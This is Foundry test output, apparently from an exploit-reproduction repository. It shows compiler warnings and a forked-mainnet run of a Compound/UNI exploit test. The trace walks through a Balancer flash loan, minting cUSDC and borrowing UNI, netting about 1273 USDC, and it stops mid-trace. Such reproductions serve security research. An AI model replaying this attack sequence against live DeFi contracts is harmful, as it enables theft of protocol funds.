Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.28s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/CompoundUni_exp.sol:22:5:
   |
22 |     IERC20 public USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/CompoundUni_exp.sol:29:5:
   |
29 |     IWETH public WETH = IWETH(payable(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 618.12ms (3.70ms CPU time)

Ran 1 test for src/test/2024-02/CompoundUni_exp.sol:ContractTest
[PASS] testExploit() (gas: 914871)
Logs:
  USDC balance:
     [INFO] Before attack: 0.000000
     [INFO] After attack: 1273.306899
  When compound update the price, incomplete liquidation leading to bad debts

Traces:
  [29448] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19290920 [1.929e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], "Balancer vault")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], "USDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], "cUSDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(comptroller: [0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B], "comptroller")
    │   └─ ← [Return]
    ├─ [0] VM::label(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550], "cUniToken")
    │   └─ ← [Return]
    ├─ [0] VM::label(UNI_WETH_Pool: [0x1d42064Fc4Beb5F8aAF85F4617AE8b3b5B8Bd801], "UNI_WETH_Pool")
    │   └─ ← [Return]
    ├─ [0] VM::label(uni: [0x1f9840a85d5aF5bf1D1762F925BDADdC4201F984], "uni")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH_USDC_Pool: [0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640], "WETH_USDC_Pool")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1002871] ContractTest::testExploit()
    ├─ [0] console::log("USDC balance:") [staticcall]
    │   └─ ← [Stop]
    ├─ [9839] USDC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "   [INFO] Before attack", val: 0, decimals: 6)
    ├─ [966055] Balancer vault::flashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], [193020254960 [1.93e11]], 0x)
    │   ├─ [3339] USDC::balanceOf(Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [delegatecall]
    │   │   │   └─ ← [Return] 10858734712132 [1.085e13]
    │   │   └─ ← [Return] 10858734712132 [1.085e13]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [30152] USDC::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 193020254960 [1.93e11])
    │   │   ├─ [29363] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 193020254960 [1.93e11]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 193020254960 [1.93e11])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x231554ca30e30e3daf1985a58abe660eac42605fd6c849ff49b261c6a9f01b7d: 0x000000000000000000000000000000000000000000000000000009e03f067544 → 0x000000000000000000000000000000000000000000000000000009b34e1f1a54
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000002cf0e75af0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [910946] ContractTest::receiveFlashLoan([0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], [193020254960 [1.93e11]], [0], 0x)
    │   │   ├─ [25462] USDC::approve(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], 193020254960 [1.93e11])
    │   │   │   ├─ [24673] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::approve(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], 193020254960 [1.93e11]) [delegatecall]
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], value: 193020254960 [1.93e11])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9eec21cbcbe49a9595d7eb0824a6fc04dcfce1a0d64ac8f4a4b1b817bc98b016: 0 → 0x0000000000000000000000000000000000000000000000000000002cf0e75af0
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [160230] cUSDC::mint(193020254960 [1.93e11])
    │   │   │   ├─ [3339] USDC::balanceOf(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [staticcall]
    │   │   │   │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 24213611495130 [2.421e13]
    │   │   │   │   └─ ← [Return] 24213611495130 [2.421e13]
    │   │   │   ├─ [10814] 0xD8EC56013EA119E7181d231E5048f90fBbe753c0::getBorrowRate(24213611495130 [2.421e13], 95463322399334 [9.546e13], 16943013134261 [1.694e13]) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000140780cf73
    │   │   │   ├─ emit AccrueInterest(: 4894503437 [4.894e9], : 1351850214647425089 [1.351e18], : 95468216902771 [9.546e13])
    │   │   │   ├─ [48877] comptroller::mintAllowed(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 193020254960 [1.93e11])
    │   │   │   │   ├─ [43697] 0xBafE01ff935C7305907c33BF824352eE5979B526::mintAllowed(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 193020254960 [1.93e11]) [delegatecall]
    │   │   │   │   │   ├─ [2553] cUSDC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ emit DistributedSupplierComp(param0: cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 77232613081136195923568085522837569385714 [7.723e40])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xd3d8ec56653fd25ce44d8de1229fc5bfc7b6aee087bc370605a34c5344a1d1de: 0 → 0x000000000000000000000000000000e2f75c38bc4ee0a2cb2f3668038541b4f2
    │   │   │   │   │   │   @ 0x8fc13d1caece6612221ef6979b11849610022c9b44e3f1d08267517678547dc6: 0x0126545e0000000000000000000000e2f75c38bc4ee0a2cb2f3668038541b4f2 → 0x01265b280000000000000000000000e2f75c38bc4ee0a2cb2f3668038541b4f2
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [1448] USDC::allowance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [staticcall]
    │   │   │   │   ├─ [659] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::allowance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 193020254960 [1.93e11]
    │   │   │   │   └─ ← [Return] 193020254960 [1.93e11]
    │   │   │   ├─ [1339] USDC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 193020254960 [1.93e11]
    │   │   │   │   └─ ← [Return] 193020254960 [1.93e11]
    │   │   │   ├─ [1339] USDC::balanceOf(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [staticcall]
    │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 24213611495130 [2.421e13]
    │   │   │   │   └─ ← [Return] 24213611495130 [2.421e13]
    │   │   │   ├─ [9349] USDC::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], 193020254960 [1.93e11])
    │   │   │   │   ├─ [8554] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], 193020254960 [1.93e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], value: 193020254960 [1.93e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xbccdc544072f1d154275788f84bcf1a9429a7563287106936a820738716d6e84: 0x00000000000000000000000000000000000000000000000000001605abb63eda → 0x000000000000000000000000000000000000000000000000000016329c9d99ca
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000002cf0e75af0 → 0
    │   │   │   │   │   │   @ 0x9eec21cbcbe49a9595d7eb0824a6fc04dcfce1a0d64ac8f4a4b1b817bc98b016: 0x0000000000000000000000000000000000000000000000000000002cf0e75af0 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Mint(minter: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], mintAmount: 193020254960 [1.93e11], mintTokens: 819359223486269 [8.193e14])
    │   │   │   ├─ emit Transfer(from: cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 819359223486269 [8.193e14])
    │   │   │   ├─ [994] comptroller::mintVerify(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 193020254960 [1.93e11], 819359223486269 [8.193e14])
    │   │   │   │   ├─ [381] 0xBafE01ff935C7305907c33BF824352eE5979B526::mintVerify(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 193020254960 [1.93e11], 819359223486269 [8.193e14]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0: 825063 → 825064
    │   │   │   │   @ 14: 0x000000000000000000000000000000000000000000000000060d5d8097eca259 → 0x000000000000000000000000000000000000000000000000061046b487623996
    │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000000056d2c96bb266 → 0x000000000000000000000000000000000000000000000000000056d3ed27e473
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000012c27d92c21c18d2 → 0x00000000000000000000000000000000000000000000000012c2bc9b99986841
    │   │   │   │   @ 0xc43a18728dee70c1cf76a513eef739350a6e2b673f21a950d1ef74884d13ae6e: 0 → 0x0000000000000000000000000000000000000000000000000002e933ef75973d
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000000000012658d4 → 0x0000000000000000000000000000000000000000000000000000000001265b28
    │   │   │   │   @ 13: 0x00000000000000000000000000000000000000000000000000000f68da477fb5 → 0x00000000000000000000000000000000000000000000000000000f6989520423
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [70431] comptroller::enterMarkets([0x39AA39c021dfbaE8faC545936693aC917d5E7563])
    │   │   │   ├─ [69730] 0xBafE01ff935C7305907c33BF824352eE5979B526::enterMarkets([0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [delegatecall]
    │   │   │   │   ├─ emit MarketEntered(rToken: cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563], account: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 1
    │   │   │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0cf: 0 → 0x00000000000000000000000039aa39c021dfbae8fac545936693ac917d5e7563
    │   │   │   │   │   @ 0x54e45edb6ae82a28c984636fb12937385069a8f9da45683fe763416c1eb8fe35: 0 → 1
    │   │   │   │   └─ ← [Return] [0]
    │   │   │   └─ ← [Return] [0]
    │   │   ├─ [21763] comptroller::getAccountLiquidity(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [21068] 0xBafE01ff935C7305907c33BF824352eE5979B526::getAccountLiquidity(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   ├─ [6556] cUSDC::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   ├─ [1339] USDC::balanceOf(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [staticcall]
    │   │   │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 24406631750090 [2.44e13]
    │   │   │   │   │   │   └─ ← [Return] 24406631750090 [2.44e13]
    │   │   │   │   │   └─ ← [Return] 0, 819359223486269 [8.193e14], 0, 235574641045381 [2.355e14]
    │   │   │   │   ├─ [2204] 0x50ce56A3239671Ab62f185704Caedf626352741e::getUnderlyingPrice(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1000000000000000000000000000000 [1e30]
    │   │   │   │   └─ ← [Return] 0, 165032317990799320700554 [1.65e23], 0
    │   │   │   └─ ← [Return] 0, 165032317990799320700554 [1.65e23], 0
    │   │   ├─ [395] uni::decimals() [staticcall]
    │   │   │   └─ ← [Return] 18
    │   │   ├─ [4946] 0x50ce56A3239671Ab62f185704Caedf626352741e::getUnderlyingPrice(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550]) [staticcall]
    │   │   │   └─ ← [Return] 8340000000000000000 [8.34e18]
    │   │   ├─ [308672] cUniToken::borrow(19788000000000000000000 [1.978e22])
    │   │   │   ├─ [302813] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::borrow(19788000000000000000000 [1.978e22]) [delegatecall]
    │   │   │   │   ├─ [2797] uni::balanceOf(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2093977896101008115558446 [2.093e24]
    │   │   │   │   ├─ [7816] 0xd956188795ca6F4A74092ddca33E0Ea4cA3a1395::getBorrowRate(2093977896101008115558446 [2.093e24], 250771651710776367598090 [2.507e23], 69602941625199523629372 [6.96e22]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004f61d305c
    │   │   │   │   ├─ emit AccrueInterest(cashPrior: 2093977896101008115558446 [2.093e24], interestAccumulated: 72871865343065664509 [7.287e19], borrowIndex: 1214348808918321256 [1.214e18], totalBorrows: 250844523576119433262599 [2.508e23])
    │   │   │   │   ├─ [136813] comptroller::borrowAllowed(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19788000000000000000000 [1.978e22])
    │   │   │   │   │   ├─ [136133] 0xBafE01ff935C7305907c33BF824352eE5979B526::borrowAllowed(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19788000000000000000000 [1.978e22]) [delegatecall]
    │   │   │   │   │   │   ├─ emit MarketEntered(rToken: cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550], account: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [2946] 0x50ce56A3239671Ab62f185704Caedf626352741e::getUnderlyingPrice(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 8340000000000000000 [8.34e18]
    │   │   │   │   │   │   ├─ [454] cUniToken::totalBorrows() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 250844523576119433262599 [2.508e23]
    │   │   │   │   │   │   ├─ [4556] cUSDC::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   ├─ [1339] USDC::balanceOf(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 24406631750090 [2.44e13]
    │   │   │   │   │   │   │   │   └─ ← [Return] 24406631750090 [2.44e13]
    │   │   │   │   │   │   │   └─ ← [Return] 0, 819359223486269 [8.193e14], 0, 235574641045381 [2.355e14]
    │   │   │   │   │   │   ├─ [2204] 0x50ce56A3239671Ab62f185704Caedf626352741e::getUnderlyingPrice(cUSDC: [0x39AA39c021dfbaE8faC545936693aC917d5E7563]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1000000000000000000000000000000 [1e30]
    │   │   │   │   │   │   ├─ [13719] cUniToken::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   ├─ [10893] cUniToken::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [9008] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   │   ├─ [797] uni::balanceOf(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 2093977896101008115558446 [2.093e24]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 203906917579520799136675388 [2.039e26]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a8aaf826b6cf53d2f1f63c
    │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 203906917579520799136675388 [2.039e26]
    │   │   │   │   │   │   ├─ [2946] 0x50ce56A3239671Ab62f185704Caedf626352741e::getUnderlyingPrice(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 8340000000000000000 [8.34e18]
    │   │   │   │   │   │   ├─ [387] cUniToken::borrowIndex() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1214348808918321256 [1.214e18]
    │   │   │   │   │   │   ├─ [4922] cUniToken::borrowBalanceStored(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   ├─ [2405] cUniToken::delegateToImplementation(0x95dd91930000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [748] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::borrowBalanceStored(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ emit DistributedBorrowerComp(param0: cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 1008922696786268143104260768386143791 [1.008e36])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0d0: 0 → 0x00000000000000000000000035a18000230da775cac24873d00ff85bccded550
    │   │   │   │   │   │   │   @ 0x94026470579dade20bbb195e632db4bf2b9b3b80a6ccfff35d0fed046ceabcb2: 0x01262b4100000000000000000000000000c24fbac00a51612b5f8e56f206562f → 0x01265b2800000000000000000000000000c24fbac00a51612b5f8e56f206562f
    │   │   │   │   │   │   │   @ 0xd3444737ce043bfa7143ba897b3e4f3b3739c8e813fd2500865a679aa3e7b83f: 0 → 0x0000000000000000000000000000000000c24fbac00a51612b5f8e56f206562f
    │   │   │   │   │   │   │   @ 0x682eb2f8453604ce179764b3166248987047b144a03e57301f65f8dfa109efa9: 0 → 1
    │   │   │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 1 → 2
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [797] uni::balanceOf(cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2093977896101008115558446 [2.093e24]
    │   │   │   │   ├─ [66331] uni::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19788000000000000000000 [1.978e22])
    │   │   │   │   │   ├─ emit Transfer(from: cUniToken: [0x35A18000230DA775CAc24873d00Ff85BccdeD550], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 19788000000000000000000 [1.978e22])
    │   │   │   │   │   ├─ emit DelegateVotesChanged(delegate: 0xbbf3f1421D886E9b2c5D716B5192aC998af2012c, previousBalance: 2093989051204332981727685 [2.093e24], newBalance: 2074201051204332981727685 [2.074e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x721f2b1cb9f99b674fe5c7c0cdfaeb08cbc94d46fb3c3f17084348b1fc63aac6: 0x00000000000000000000000000000000000000000001bb6ac4ea957d765ce82e → 0x00000000000000000000000000000000000000000001b73a0f404eceb0ace82e
    │   │   │   │   │   │   @ 0x82b34cdc4a5e594815d7017fb18029bb16fde23073e4060a8834f26f183967fd: 0 → 0x000000000000000000000000000000000001b73aaa0f322dd81a31c501265b28
    │   │   │   │   │   │   @ 0x4fb66b896fddf3708da281eec5e36eecf339a2120d959d3722b0cad4c162d74b: 24002 → 24003
    │   │   │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x000000000000000000000000000000000000000000000430b5aa46aec5b00000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Borrow(borrower: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 19788000000000000000000 [1.978e22], accountBorrows: 19788000000000000000000 [1.978e22], totalBorrows: 270632523576119433262599 [2.706e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x000000000000000000000000000000000000000000000430b5aa46aec5b00000
    │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000ebd2edacbedeb71893c → 0x000000000000000000000000000000000000000000000ebe2bae03c9f0d3543b
    │   │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000010d8faf5cc382b67 → 0x00000000000000000000000000000000000000000000000010da3bceccfec868
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x00000000000000000000000000000000000000000000000010da3bceccfec868
